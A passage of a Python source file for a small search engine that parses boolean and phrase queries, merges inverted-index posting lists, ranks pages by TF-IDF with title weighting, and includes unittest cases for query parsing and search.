output_file.close()\n\n\ndef create_all_page_ids(token_file_name, all_page_ids_file_name):\n token_file = open(token_file_name, 'r', encoding='utf-8')\n all_page_ids_file = open(all_page_ids_file_name, 'wb')\n all_page_ids = []\n\n number_terms = 0\n for line in token_file:\n if line.startswith(PAGE_TOKEN_PREFIX):\n line = line.replace(PAGE_TOKEN_PREFIX, '')\n id_page = int(line)\n\n if len(all_page_ids) > 0:\n all_page_ids[-1] = [all_page_ids[-1], number_terms]\n\n number_terms = 
0\n all_page_ids.append(id_page)\n else:\n number_terms += len(line.split())\n\n all_page_ids[-1] = [all_page_ids[-1], number_terms]\n #print(all_page_ids)\n all_page_ids.sort(key=lambda a: a[0])\n for page_id, terms_counter in all_page_ids:\n all_page_ids_file.write(struct.pack('ii', page_id, terms_counter))\n #print(all_page_ids)\n token_file.close()\n all_page_ids_file.close()\n\n\ndef read_all_page_ids(all_page_ids_file_name):\n all_page_ids_file = open(all_page_ids_file_name, 'rb')\n\n page_ids = []\n for buffer in iter(lambda: all_page_ids_file.read(2*INTEGER_LENGTH), b''):\n if buffer == b'':\n break\n page_ids.append(struct.unpack('ii', buffer)[0])\n\n all_page_ids_file.close()\n\n return page_ids\n\n\ndef read_all_page_ids_with_stat(all_page_ids_file_name):\n all_page_ids_file = open(all_page_ids_file_name, 'rb')\n\n page_ids_with_stat = dict()\n for buffer in iter(lambda: all_page_ids_file.read(2*INTEGER_LENGTH), b''):\n if buffer == b'':\n break\n page_id, terms_number = list(struct.unpack('ii', buffer))\n page_ids_with_stat[page_id] = terms_number\n\n all_page_ids_file.close()\n\n return page_ids_with_stat\n\n\ndef union_ids(a, b, inverse_index_file_name):\n result = []\n\n if not a[0] and not b[0]:\n a = a[1]\n b = b[1]\n elif a[0] and b[0]:\n a = [x for x, y in read_page_ids(inverse_index_file_name, a[2], None)]\n b = [x for x, y in read_page_ids(inverse_index_file_name, b[2], None)]\n elif a[0]:\n a = [x for x, y in read_page_ids(inverse_index_file_name, a[2], None)]\n b = b[1]\n else:\n b = [x for x, y in read_page_ids(inverse_index_file_name, b[2], None)]\n a = a[1]\n\n n, m = len(a), len(b)\n i, j = 0, 0\n\n while i < n and j < m:\n if a[i] < b[j]:\n result.append(a[i])\n i += 1\n elif b[j] < a[i]:\n result.append(b[j])\n j += 1\n else:\n result.append(a[i])\n i += 1\n j += 1\n\n if i < n:\n result.extend(a[i:])\n if j < m:\n result.extend(b[j:])\n\n return result\n\n\ndef intersection_ids(a, b, inverse_index_file_name):\n result = []\n\n if not a[0] and not b[0]:\n a = a[1]\n b = b[1]\n\n n, m = len(a), len(b)\n i, j = 0, 0\n\n while i < n and j < m:\n if a[i] < b[j]:\n i += 1\n elif b[j] < a[i]:\n j += 1\n else:\n result.append(a[i])\n i += 1\n j += 1\n elif a[0] and b[0]:\n a = [x for x, y in read_page_ids(inverse_index_file_name, a[2])]\n b = [x for x, y in read_page_ids(inverse_index_file_name, b[2])]\n\n n, m = len(a), len(b)\n i, j = 0, 0\n\n while i < n and j < m:\n if a[i] < b[j]:\n i += 1\n elif b[j] < a[i]:\n j += 1\n else:\n result.append(a[i])\n i += 1\n j += 1\n else:\n if b[0]:\n a, b = b, a\n inverse_offset = a[2]\n a = a[1]\n b = b[1]\n n, m = len(a), len(b)\n i, j = 0, 0\n while i < n and j < m:\n if a[i][0] < b[j]:\n i += 1\n elif b[j] < a[i][0]:\n block_page_ids = read_block_page_ids(a, i - 1, inverse_index_file_name, inverse_offset)\n k = 0\n while k < len(block_page_ids) and j < m:\n if block_page_ids[k] < b[j]:\n k += 1\n elif b[j] < block_page_ids[k]:\n j += 1\n else:\n result.append(block_page_ids[k])\n k += 1\n j += 1\n i += 1\n else:\n result.append(a[i][0])\n i += 1\n j += 1\n\n last_block_page_ids = read_block_page_ids(a, len(a)-1, inverse_index_file_name, inverse_offset)\n k = 0\n while k < len(last_block_page_ids) and j < m:\n if last_block_page_ids[k] < b[j]:\n k += 1\n elif b[j] < last_block_page_ids[k]:\n j += 1\n else:\n result.append(last_block_page_ids[k])\n k += 1\n j += 1\n\n return result\n\n\ndef difference_ids(a, b, inverse_index_file_name):\n result = []\n\n if not a[0] and not b[0]:\n a = a[1]\n b = b[1]\n elif a[0] and b[0]:\n 
a = [x for x, y in read_page_ids(inverse_index_file_name, a[2], None)]\n b = [x for x, y in read_page_ids(inverse_index_file_name, b[2], None)]\n elif a[0]:\n a = [x for x, y in read_page_ids(inverse_index_file_name, a[2], None)]\n b = b[1]\n else:\n b = [x for x, y in read_page_ids(inverse_index_file_name, b[2], None)]\n a = a[1]\n\n n, m = len(a), len(b)\n i, j = 0, 0\n\n while i < n and j < m:\n if a[i] < b[j]:\n result.append(a[i])\n i += 1\n elif b[j] < a[i]:\n j += 1\n else:\n i += 1\n j += 1\n\n if i < n:\n result.extend(a[i:])\n\n return result\n\n\nclass TokenType:\n UNKNOWN = -1\n LEXEME = 0\n QUOTE = 1\n OPERATOR_BIN = 2\n OPERATOR_UNO = 3\n OPEN_BRACKET_ROUNDED = 4\n OPEN_BRACKET_FIGURE = 5\n OPEN_BRACKET_SQUARE = 6\n CLOSE_BRACKET_ROUNDED = 7\n CLOSE_BRACKET_FIGURE = 8\n CLOSE_BRACKET_SQUARE = 9\n\n\ndef get_RPN_by_request(user_request):\n user_request = user_request.lower()\n request = ''\n for i in range(len(user_request)):\n if not (user_request[i].isdigit() or user_request[i].isalpha() or\n user_request[i] in [')', ']', '}', '(', '[', '{', '&', '|', '!', '\"', '/']):\n request += ' '\n else:\n request += user_request[i]\n position = [0]\n last_token_type = [-1]\n\n def get_next_token():\n while True:\n #print(request)\n #print(' '*position[0]+'^')\n if position[0] >= len(request):\n return None, None\n\n if (request[position[0]].isalpha() or request[position[0]].isdigit()) and last_token_type[0] == TokenType.QUOTE:\n last_token_type[0] = TokenType.OPERATOR_BIN\n return TokenType.OPERATOR_BIN, '&&'\n if request[position[0]].isalpha() or request[position[0]].isdigit():\n token = ''\n while position[0] < len(request) and (request[position[0]].isalpha() or request[position[0]].isdigit()):\n token += request[position[0]].lower()\n position[0] += 1\n last_token_type[0] = TokenType.LEXEME\n return TokenType.LEXEME, token\n if request[position[0]].isspace() and (last_token_type[0] == TokenType.LEXEME\n or last_token_type[0] == TokenType.QUOTE\n or last_token_type[0] >= TokenType.CLOSE_BRACKET_ROUNDED):\n while position[0] < len(request) and request[position[0]].isspace():\n position[0] += 1\n if position[0] < len(request) and (request[position[0]].isalpha() or request[position[0]].isdigit() or\n request[position[0]] in ['(', '[', '{', '!', '\"']):\n last_token_type[0] = TokenType.OPERATOR_BIN\n return TokenType.OPERATOR_BIN, '&&'\n if position[0] >= len(request):\n return None, None\n if request[position[0]].isspace():\n while position[0] < len(request) and request[position[0]].isspace():\n position[0] += 1\n if position[0] >= len(request):\n return None, None\n if position[0]+1 < len(request) and request[position[0]] == '&' and request[position[0]+1] == '&':\n position[0] += 2\n\n last_token_type[0] = TokenType.OPERATOR_BIN\n return TokenType.OPERATOR_BIN, '&&'\n elif request[position[0]] == '&':\n return TokenType.UNKNOWN, None\n if position[0] + 1 < len(request) and request[position[0]] == '|' and request[position[0] + 1] == '|':\n position[0] += 2\n last_token_type[0] = TokenType.OPERATOR_BIN\n return TokenType.OPERATOR_BIN, '||'\n elif request[position[0]] == '|':\n return TokenType.UNKNOWN, None\n if request[position[0]] == '!':\n position[0] += 1\n last_token_type[0] = TokenType.OPERATOR_UNO\n return TokenType.OPERATOR_UNO, '!'\n if request[position[0]] == '(':\n position[0] += 1\n last_token_type[0] = TokenType.OPEN_BRACKET_ROUNDED\n return TokenType.OPEN_BRACKET_ROUNDED, '('\n if request[position[0]] == '[':\n position[0] += 1\n last_token_type[0] = 
TokenType.OPEN_BRACKET_SQUARE\n return TokenType.OPEN_BRACKET_SQUARE, '['\n if request[position[0]] == '{':\n position[0] += 1\n last_token_type[0] = TokenType.OPEN_BRACKET_FIGURE\n return TokenType.OPEN_BRACKET_FIGURE, '{'\n if request[position[0]] == ')':\n position[0] += 1\n last_token_type[0] = TokenType.CLOSE_BRACKET_ROUNDED\n return TokenType.CLOSE_BRACKET_ROUNDED, ')'\n if request[position[0]] == '}':\n position[0] += 1\n last_token_type[0] = TokenType.CLOSE_BRACKET_FIGURE\n return TokenType.CLOSE_BRACKET_FIGURE, '}'\n if request[position[0]] == ']':\n position[0] += 1\n last_token_type[0] = TokenType.CLOSE_BRACKET_SQUARE\n return TokenType.CLOSE_BRACKET_SQUARE, ']'\n if request[position[0]] == '\"':\n start = position[0] + 1\n position[0] += 1\n while position[0] < len(request) and request[position[0]] != '\"':\n if not (request[position[0]].isalpha() or request[position[0]].isdigit()\n or request[position[0]].isspace()):\n return TokenType.UNKNOWN, None\n position[0] += 1\n if position[0] >= len(request):\n return TokenType.UNKNOWN, None\n lexemes = request[start:position[0]].split()\n\n if len(lexemes) == 0:\n return TokenType.UNKNOWN, None\n\n distance = len(lexemes) - 1\n position[0] += 1\n space = False\n free_space_after = False\n while position[0] < len(request) and request[position[0]].isspace():\n space = True\n position[0] += 1\n if position[0] < len(request) and request[position[0]] == '/':\n position[0] += 1\n while position[0] < len(request) and request[position[0]].isspace():\n position[0] += 1\n free_space_after = True\n if position[0] >= len(request) or not request[position[0]].isdigit():\n return TokenType.UNKNOWN, None\n start_digit = position[0]\n while position[0] < len(request) and request[position[0]].isdigit():\n position[0] += 1\n if position[0] >= len(request):\n distance = int(request[start_digit:])\n elif request[position[0]].isspace() or request[position[0]] in ['&', '|', '(', '[',\n '{', ')', ']', '}']:\n distance = int(request[start_digit:position[0]])\n else:\n return TokenType.UNKNOWN, None\n if distance < len(lexemes) - 1:\n return TokenType.UNKNOWN, None\n elif position[0] < len(request) and not space and request[position[0]] not in ['|', '&']:\n return TokenType.UNKNOWN, None\n elif space or free_space_after:\n position[0] -= 1\n\n last_token_type[0] = TokenType.QUOTE\n return TokenType.QUOTE, [lexemes, distance]\n\n\n result = []\n stack = []\n previous_token_type = -1\n while position[0] < len(request):\n previous_token_type = last_token_type[0]\n token_type, token_value = get_next_token()\n #print(token_value)\n\n if token_type is None:\n break\n if token_type == TokenType.UNKNOWN:\n return None\n if token_type == TokenType.OPERATOR_BIN and previous_token_type == TokenType.OPERATOR_BIN:\n return None\n if token_type == TokenType.OPERATOR_BIN and previous_token_type == -1:\n return None\n if token_type == TokenType.LEXEME or token_type == TokenType.QUOTE:\n result.append([token_type, token_value])\n elif token_type == TokenType.OPERATOR_UNO:\n stack.append([token_type, token_value])\n elif token_type >= TokenType.OPEN_BRACKET_ROUNDED and token_type <= TokenType.OPEN_BRACKET_SQUARE:\n stack.append([token_type, token_value])\n elif token_type >= TokenType.CLOSE_BRACKET_ROUNDED and token_type <= TokenType.CLOSE_BRACKET_SQUARE:\n while len(stack) > 0 and stack[-1][0] != token_type - 3:\n top_type, top_value = stack.pop()\n if top_type >= TokenType.OPEN_BRACKET_ROUNDED and top_type <= TokenType.OPEN_BRACKET_SQUARE:\n return None\n 
result.append([top_type, top_value])\n if len(stack) == 0:\n return None\n stack.pop()\n elif token_type == TokenType.OPERATOR_BIN:\n while len(stack) > 0 and (stack[-1][0] == TokenType.OPERATOR_UNO or stack[-1][1] == token_value\n or (stack[-1][1] == '&&' and token_value == '||')):\n result.append(stack.pop())\n stack.append([token_type, token_value])\n if last_token_type[0] == TokenType.OPERATOR_BIN or last_token_type[0] == TokenType.OPERATOR_UNO:\n return None\n while len(stack) > 0:\n if stack[-1][0] == TokenType.OPERATOR_BIN or stack[-1][0] == TokenType.OPERATOR_UNO:\n result.append(stack.pop())\n else:\n return None\n\n return result\n\n\ndef positional_intersect_ids(data, p, coordinate_index_file_name):\n token_number = len(data)\n\n if token_number == 1:\n return [x for x, y in data[0]]\n\n intersect = data[0]\n for k in range(1, token_number):\n temp = []\n n, m = len(intersect), len(data[k])\n i, j = 0, 0\n\n while i < n and j < m:\n if intersect[i][0] < data[k][j][0]:\n i += 1\n elif data[k][j][0] < intersect[i][0]:\n j += 1\n else:\n page_id = intersect[i][0]\n offsets = intersect[i][1]\n\n if k == 1:\n offsets = [offsets]\n\n offsets.append(data[k][j][1])\n temp.append([page_id, offsets])\n\n i += 1\n j += 1\n\n intersect = temp\n\n #print('intersect: ', intersect)\n result = []\n for page_id, offsets in intersect:\n coordinates = []\n for offset in offsets:\n coordinates.append(read_coordinates(coordinate_index_file_name, offset))\n #print('coordinates:', coordinates)\n indexes = [0] * token_number\n while True:\n final = False\n for i in range(token_number):\n if indexes[i] >= len(coordinates[i]):\n final = True\n break\n\n if final:\n break\n\n i = 0\n another_token_number = p - token_number + 1\n while i < token_number - 1:\n while indexes[i] < len(coordinates[i]) and indexes[i+1] < len(coordinates[i+1]):\n if coordinates[i+1][indexes[i+1]] - coordinates[i][indexes[i]] > another_token_number + 1:\n indexes[i] += 1\n elif coordinates[i][indexes[i]] >= coordinates[i+1][indexes[i+1]]:\n indexes[i+1] += 1\n else:\n distance = coordinates[i+1][indexes[i+1]] - coordinates[i][indexes[i]]\n another_token_number -= distance - 1\n i += 1\n break\n if i < token_number - 1 and (indexes[i] >= len(coordinates[i]) or indexes[i+1] >= len(coordinates[i+1])):\n break\n\n if i == token_number - 1:\n result.append(page_id)\n break\n\n #print('result:', result)\n return result\n\n\ndef get_page_ids_by_request(request, dictionary, inverse_index_file_name,\n all_page_ids, coordinate_index_file_name, jump_table_file_name,\n inverse_index_title_file_name, coordinate_index_title_file_name):\n rpn = get_RPN_by_request(request)\n stack = []\n stack_title = []\n for token_type, token_value in rpn:\n if token_type == TokenType.LEXEME:\n hash_token = hash_used(remove_rus_ending(token_value))\n if hash_token not in dictionary.keys():\n stack.append([False, []])\n else:\n number_ids, offset, jump_table_offset, offset_title = dictionary[hash_token]\n if jump_table_offset == -1:\n stack.append([False, [x for x, y in read_page_ids(inverse_index_file_name, offset, number_ids)]])\n else:\n stack.append([True, read_jump_table(jump_table_file_name, jump_table_offset), offset])\n stack_title.append([False, [x for x, y in read_page_ids(inverse_index_title_file_name, offset_title)]])\n elif token_type == TokenType.QUOTE:\n data = []\n data_title = []\n for token in token_value[0]:\n hash_token = hash_used(remove_rus_ending(token))\n number_ids, offset, jump_table_offset, offset_title = dictionary[hash_token]\n 
data.append(read_page_ids(inverse_index_file_name, offset))\n data_title.append(read_page_ids(inverse_index_title_file_name, offset_title))\n stack.append([False, positional_intersect_ids(data, token_value[1], coordinate_index_file_name)])\n stack_title.append([False, positional_intersect_ids(data_title, token_value[1], coordinate_index_title_file_name)])\n elif token_type == TokenType.OPERATOR_UNO:\n if len(stack) == 0:\n return None\n value = stack.pop()\n value_title = stack_title.pop()\n if token_value == '!':\n stack.append([False, difference_ids([False, all_page_ids], value, inverse_index_file_name)])\n stack_title.append([False, difference_ids([False, all_page_ids], value_title, inverse_index_title_file_name)])\n else:\n return None\n elif token_type == TokenType.OPERATOR_BIN:\n if len(stack) < 2:\n return None\n value_a = stack.pop()\n value_b = stack.pop()\n value_a_title = stack_title.pop()\n value_b_title = stack_title.pop()\n\n if token_value == '&&':\n stack.append([False, intersection_ids(value_a, value_b, inverse_index_file_name)])\n stack_title.append([False, intersection_ids(value_a_title, value_b_title, inverse_index_title_file_name)])\n elif token_value == '||':\n stack.append([False, union_ids(value_a, value_b, inverse_index_file_name)])\n stack_title.append([False, union_ids(value_a_title, value_b_title, inverse_index_title_file_name)])\n else:\n return None\n else:\n return None\n\n if len(stack) != 1 or len(stack_title) != 1:\n return None\n\n if stack[0][0]:\n return [x for x, y in read_page_ids(inverse_index_file_name, stack[0][2])]\n\n return [stack[0][1], stack_title[0][1]]\n\n\ndef get_SERP_by_request(request, dictionary, inverse_index_file_name, all_page_ids,\n straight_index, coordinate_index_file_name, jump_table_file_name,\n all_page_ids_with_stat, token_file_name, inverse_index_title_file_name,\n coordinate_index_title_file_name):\n terms = ''\n is_boolean_request = False\n for i in range(len(request)):\n if request[i].isalpha() or request[i].isdigit():\n terms += request[i]\n else:\n terms += ' '\n if request[i] in ['&', '|', '(', '[', '{', ')', ']', '}', '!', '\"']:\n is_boolean_request = True\n terms = terms.lower()\n terms = [remove_rus_ending(t) for t in terms.split()]\n\n page_ids = [False, []]\n page_ids_title = [False, []]\n if is_boolean_request:\n page_ids, page_ids_title = get_page_ids_by_request(request, dictionary, inverse_index_file_name, all_page_ids,\n coordinate_index_file_name, jump_table_file_name,\n inverse_index_title_file_name, coordinate_index_title_file_name)\n else:\n for term in terms:\n term_hash = hash_used(term)\n if term_hash not in dictionary.keys():\n continue\n page_ids = [False, union_ids(page_ids,\n [False, [x for x,y in read_page_ids(inverse_index_file_name, dictionary[term_hash][1])]],\n inverse_index_file_name)]\n page_ids_title = [False, union_ids(page_ids,\n [False, [x for x,y in read_page_ids(inverse_index_title_file_name, dictionary[term_hash][3])]],\n inverse_index_title_file_name)]\n page_ids = page_ids[1]\n page_ids_title = page_ids_title[1]\n\n collection_length = len(all_page_ids)\n\n if (page_ids is None and page_ids_title is None) or (len(page_ids) == 0 and len(page_ids_title)):\n return None\n\n page_ids = [[x, 0.0] for x in page_ids]\n page_ids_title = [[x, 0.0] for x in page_ids_title]\n\n for term in terms:\n term_hash = hash_used(term)\n if term_hash not in dictionary.keys():\n continue\n\n number_ids, offset, jump_table_offset, offset_title = dictionary[term_hash]\n page_ids_info = 
read_page_ids(inverse_index_file_name, offset)\n for_bisect = [x for x, y in page_ids_info]\n page_ids_info_title = read_page_ids(inverse_index_title_file_name, offset_title)\n for_bisect_title = [x for x, y in page_ids_info_title]\n\n if len(page_ids_info) > 0:\n for i in range(len(page_ids)):\n index_page_id = bisect.bisect_left(for_bisect, page_ids[i][0])\n term_entering_number = 0\n if index_page_id < len(page_ids_info) and page_ids_info[index_page_id][0] == page_ids[i][0]:\n term_entering_number = read_number_coordinates(coordinate_index_file_name,\n page_ids_info[index_page_id][1])\n page_ids[i][1] += ((term_entering_number / all_page_ids_with_stat[page_ids[i][0]]) * math.log2(collection_length / len(page_ids_info))) * (1.0 - TITLE_TF_IDF_WEIGHT)\n if len(page_ids_info_title) > 0:\n for i in range(len(page_ids_title)):\n index_page_id_title = bisect.bisect_left(for_bisect_title, page_ids_title[i][0])\n term_entering_number = 0\n if index_page_id_title < len(page_ids_info_title) and page_ids_info_title[index_page_id_title][0] == page_ids_title[i][0]:\n term_entering_number = read_number_coordinates(coordinate_index_title_file_name,\n page_ids_info_title[index_page_id_title][1])\n page_ids_title[i][1] += (term_entering_number / len(straight_index[page_ids_title[i][0]][1].split())) * math.log2(collection_length / len(page_ids_info_title)) * TITLE_TF_IDF_WEIGHT\n\n page_ids_result = []\n index_i, index_j = 0, 0\n while index_i < len(page_ids) and index_j < len(page_ids_title):\n if page_ids[index_i][0] == page_ids_title[index_j][0]:\n page_ids_result.append([page_ids[index_i][0], page_ids[index_i][1]*(1.0-TITLE_TF_IDF_WEIGHT)+\n page_ids_title[index_j][1]*TITLE_TF_IDF_WEIGHT])\n index_i += 1\n index_j += 1\n elif page_ids[index_i][0] > page_ids_title[index_j][0]:\n page_ids_result.append([page_ids_title[index_i][0], page_ids_title[index_j][1]*TITLE_TF_IDF_WEIGHT])\n index_j += 1\n else:\n page_ids_result.append([page_ids[index_i][0], page_ids[index_i][1] * (1.0 - TITLE_TF_IDF_WEIGHT)])\n index_i += 1\n while index_i < len(page_ids):\n page_ids_result.append([page_ids[index_i][0], page_ids[index_i][1] * (1.0 - TITLE_TF_IDF_WEIGHT)])\n index_i += 1\n while index_j < len(page_ids_title):\n page_ids_result.append([page_ids_title[index_i][0], page_ids_title[index_j][1] * TITLE_TF_IDF_WEIGHT])\n index_j += 1\n\n page_ids = page_ids_result\n page_ids.sort(key=lambda a: a[1], reverse=True)\n page_ids = page_ids[0:STATES_NUMBER_IN_SERP]\n first_coordinates = dict()\n for term in terms:\n term_hash = hash_used(term)\n if term_hash not in dictionary.keys():\n continue\n\n number_ids, offset, jump_table_offset, _ = dictionary[term_hash]\n page_ids_info = read_page_ids(inverse_index_file_name, offset)\n for_bisect = [x for x, y in page_ids_info]\n\n for page_id, _ in page_ids:\n index_page_id = bisect.bisect_left(for_bisect, page_id)\n if index_page_id < len(page_ids_info) and page_ids_info[index_page_id][0] == page_id:\n first_coordinate = read_first_coordinate(coordinate_index_file_name, page_ids_info[index_page_id][1])\n if page_id not in first_coordinates.keys():\n first_coordinates[page_id] = [first_coordinate]\n else:\n first_coordinates[page_id].append(first_coordinate)\n\n serp = ''\n for page_id, _ in page_ids:\n link, title, state_offset = straight_index[page_id]\n page_data = read_page_by_id(token_file_name, straight_index, page_id)[len(title.split()):]\n description = ''\n last_added_coordinate = -1\n first_coordinates[page_id].sort()\n line_length = 0\n line_number = 0\n 
#print(page_data[0:10], first_coordinates[page_id])\n for first_coordinate in first_coordinates[page_id]:\n old_length = len(description)\n if last_added_coordinate >= max(first_coordinate - SNIPPET_WINDOW_SIZE, 0):\n description += ' '.join(page_data[last_added_coordinate+1:first_coordinate+SNIPPET_WINDOW_SIZE+1])\n else:\n description += '... ' + ' '.join(page_data[max(first_coordinate - SNIPPET_WINDOW_SIZE, 0):first_coordinate + SNIPPET_WINDOW_SIZE + 1])\n line_length += len(description) - old_length\n if line_length >= SNIPPET_LINE_LENGTH:\n description += '\\n'\n line_number += 1\n line_length = 0\n if line_number >= SNIPPET_LINE_NUMBER:\n break\n description += ' '\n last_added_coordinate = first_coordinate + SNIPPET_WINDOW_SIZE\n\n serp += title + '\\n' + link + '\\n\\n' + description + '\\n'\n serp += '-------------------------------------------------------------\\n\\n'\n return serp\n\n\nclass TestSearch(unittest.TestCase):\n\n def test01_RPN_positive(self):\n infix = ['qwe && ewq\\n', '(qwe &&ewq) r ty', '!q&&(we||r)&&fgh&&(ert&&(zxc||!uio))\\n',\n ' ! q ( we || r ) fgh ( ert && ( zxc || ! uio ) ) \\n',\n '[!q&&(we||r)&&fgh&&(ert&&{zxc||!uio})]', '(qwe || !ew) && (ewq || (asd && !uy))',\n '! (qwe&&rty||df j) ', 'qwe df || qwe rt y', '\"qwe ewq: asd?\" rty uuu',\n 'rty \"qwe ewq: asd?\"&&uuu', '\"qwe ewq: asd?\"', ' \"qwe ewq: asd?\"/ 10|| dfg',\n ' [ { \"qwe ewq: asd?\"/ 10}|| (dfg || fgh)]', '\"qwe ewq: asd?\"/2', 'xcv !\"qwe ewq: asd?\"/2',\n '\"Дополнение продолжает оригинальный Quake\" \"через месяца месяца\" / 3',\n '\"Дополнение продолжает оригинальный Quake\"/ 56 \"через месяца месяца\" / 3'\n ]\n rpn = [['qwe', 'ewq', '&&'], ['qwe', 'ewq', '&&', 'r', '&&', 'ty', '&&'],\n ['q', '!', 'we', 'r', '||', '&&', 'fgh', '&&', 'ert', 'zxc', 'uio', '!', '||', '&&', '&&'],\n ['q', '!', 'we', 'r', '||', '&&', 'fgh', '&&', 'ert', 'zxc', 'uio', '!', '||', '&&', '&&'],\n ['q', '!', 'we', 'r', '||', '&&', 'fgh', '&&', 'ert', 'zxc', 'uio', '!', '||', '&&', '&&'],\n ['qwe', 'ew', '!', '||', 'ewq', 'asd', 'uy', '!', '&&', '||', '&&'],\n ['qwe', 'rty', '&&', 'df', 'j', '&&', '||', '!'],\n ['qwe', 'df', '&&', 'qwe', 'rt', '&&', 'y', '&&', '||'],\n [[['qwe', 'ewq', 'asd'], 2], 'rty', '&&', 'uuu', '&&'],\n ['rty', [['qwe', 'ewq', 'asd'], 2], '&&', 'uuu', '&&'],\n [[['qwe', 'ewq', 'asd'], 2]], [[['qwe', 'ewq', 'asd'], 10], 'dfg', '||'],\n [[['qwe', 'ewq', 'asd'], 10], 'dfg', 'fgh', '||', '||'],\n [[['qwe', 'ewq', 'asd'], 2]],\n ['xcv', [['qwe', 'ewq', 'asd'], 2], '!', '&&'],\n [[['дополнение', 'продолжает', 'оригинальный', 'quake'], 3], [['через', 'месяца', 'месяца'], 3], '&&'],\n [[['дополнение', 'продолжает', 'оригинальный', 'quake'], 56], [['через', 'месяца', 'месяца'], 3], '&&']\n ]\n\n for i in range(len(infix)):\n #print(infix[i])\n test = get_RPN_by_request(infix[i])\n self.assertTrue(test is not None, infix[i])\n self.assertTrue(len(test) == len(rpn[i]), infix[i])\n for j in range(len(rpn[i])):\n self.assertEqual(rpn[i][j], test[j][1], infix[i])\n\n def test02_RPN_negative(self):\n infix = ['qwe & ewq', '(qwe &&ewq r ty', '!q&&(we||r)||&&fgh&&(ert&&(zxc||!uio))',\n ' ! q ( we || r ) fgh ( ert && ( zxc || ! uio ) ) &&',\n '[!q&&(we||r)&&fgh&&(ert&&[zxc||!uio})]', '(qwe || !ew) && (ewq || (asd && !uy)',\n '! (qwe&&rty||df j) ! 
', '&& qwe ||ewq', '\"qwe ewq: asd?/2', 'qwe ewq: asd?\"/2',\n '\"qwe ewq: asd?\"/', '\"qwe ewq: asd?\"/ (qwe || asd)', '\"qwe ewq: asd?\"/01',\n '\"qwe ewq: asd?\"2', '\"qwe ewq: asd?\"/2asd', '\"qwe ewq: asd?\"//2', '!\"qwe ewq: asd?\"\"/2&&qwe',\n '!\"\"qwe ewq: asd?\"/2&&qwe', '\"\"', 'qwe \"asd d\" fgh \"rty ', ' \"qwe rty\"\"fgh jh\" / 3',\n ' \"qwe rty uio\"/1 ', ' \"@ 123 321 11 11\" / 2 rty', ' \"ert ty\" /5tyu', ' \"ert ty\" / 5tyu'\n ]\n\n for i in range(len(infix)):\n #print(infix[i])\n test = get_RPN_by_request(infix[i])\n self.assertTrue(test is None, infix[i])\n i += 1\n\n def test03_search(self):\n dictionary_file_name = '../dictionary.bin'\n inverse_index_file_name = '../inverse_index.bin'\n all_page_ids_file_name = '../all_page_ids.bin'\n coordinate_index_file_name = '../coordinate_index.bin'\n jump_table_file_name = '../jump_table.bin'\n inverse_index_title_file_name = '../inverse_title_index.bin'\n coordinate_index_title_file_name = '../coordinate_title_index.bin'\n\n requests = ['Quake: Scourge of Armagon', 'Действие игры разворачивается в городе Эшфилд',\n 'doom 1993', 'python (PyCharm || Visual Studio Code || Emacs) ide',\n 'resident evil !wii',\n 'final fantasy (2015 || 2016 || 2017 || 2018 || 2019)',\n 'компилятор c++ windows (Linux ||unix)', 'идеал аскетизма философ',\n 'работа Сади Карно !(президент Франции)', # 43330\n 'принцип шести степеней свободы шутер !(Shattered Horizon)',\n '\"Дополнение продолжает оригинальный Quake\"', '\"через месяца месяца\" / 3',\n '\"Гремлин — внешне напоминает Рогача\"',\n '\"Гремлин — внешне напоминает Рогача Основная способность\" / 12',\n '\"Дополнение продолжает оригинальный Quake\" \"через месяца месяца\" / 3',\n '\"Дополнение продолжает оригинальный Quake\" / 5 || \"через месяца месяца\" / 3',\n '\"Движок игры был обновлён\" \"Главный герой возвращается на базу зомбинированных солдат\" / 15 \"через месяца месяца\" / 3'\n ]\n positive_ids = [[84966], [509283], [84968], [4227719], [3154423],\n [2384697], [234594], [2995], [], [819887], [84966], [84966], [84966], [84966], [84966],\n [84966], [84966]\n ]\n negative_ids = [[52826], [], [], [6246771, 17710], [1011645, 715315], [2228067], [], [],\n [69114], [1454965], [], [], [], [], [], [], []\n ]\n\n dictionary = read_dictionary(dictionary_file_name)\n all_page_ids = read_all_page_ids(all_page_ids_file_name)\n for i in range(len(requests)):\n result, result_title = get_page_ids_by_request(requests[i], dictionary, inverse_index_file_name, all_page_ids,\n coordinate_index_file_name, jump_table_file_name,\n inverse_index_title_file_name, coordinate_index_title_file_name)\n self.assertIsNotNone(result)\n for pos_id in positive_ids[i]:\n self.assertIn(pos_id, result)\n for neg_id in negative_ids[i]:\n self.assertNotIn(neg_id, result)\n\n def test04_title_search(self):\n dictionary_file_name = '../dictionary.bin'\n inverse_index_file_name = '../inverse_index.bin'\n all_page_ids_file_name = '../all_page_ids.bin'\n coordinate_index_file_name = '../coordinate_index.bin'\n jump_table_file_name = '../jump_table.bin'\n inverse_index_title_file_name = '../inverse_title_index.bin'\n coordinate_index_title_file_name = '../coordinate_title_index.bin'\n\n requests = ['Quake: Scourge of Armagon', 'Dungeon Keeper 2', 'Wolfenstein', 'master orion',\n 'Warlords etheria', 'blackthorne', 'Фуллье'\n ]\n positive_ids = [[84966], [88956], [84591], [150269], [184586], [231098], [1064815]]\n negative_ids = [[52826], [], [], [], [], [], []]\n\n dictionary = read_dictionary(dictionary_file_name)\n all_page_ids 
= read_all_page_ids(all_page_ids_file_name)\n for i in range(len(requests)):\n _, result = get_page_ids_by_request(requests[i], dictionary, inverse_index_file_name, all_page_ids,\n coordinate_index_file_name, jump_table_file_name,\n inverse_index_title_file_name, coordinate_index_title_file_name)\n self.assertIsNotNone(result)\n for pos_id in positive_ids[i]:\n self.assertIn(pos_id, result)\n for neg_id in negative_ids[i]:\n self.assertNotIn(neg_id, result)\n\n\ndef stats_coordinates(dictionary_file_name, inverse_index_file_name, coordinate_index_file_name):\n dictionary = read_dictionary(dictionary_file_name)\n all_coordinates_number = 0\n pair_term_page_number = 0\n all_terms_number = len(dictionary)\n print(all_terms_number)\n i = 0\n for key in dictionary.keys():\n i += 1\n if i % 100000 == 0:\n print(i)\n number_ids, offset = dictionary[key]\n for page_ids, offset_coordinates in read_page_ids(inverse_index_file_name, offset, number_ids):\n pair_term_page_number += 1\n coordinates = read_coordinates(coordinate_index_file_name, offset_coordinates)\n all_coordinates_number += len(coordinates)\n print('Coordinates number:', all_coordinates_number)\n print('Average coordinates per term:', all_coordinates_number/all_terms_number)\n print('Average coordinates per pair term-page:', all_coordinates_number/pair_term_page_number)\n\n\ndef stat_before_compress_feat(token_file_name, dictionary_file_name, inverse_index_file_name, straight_index_file_name, coordinate_index_file_name):\n start_time = time.time()\n dictionary = read_dictionary(dictionary_file_name)\n print('dictionary read:', 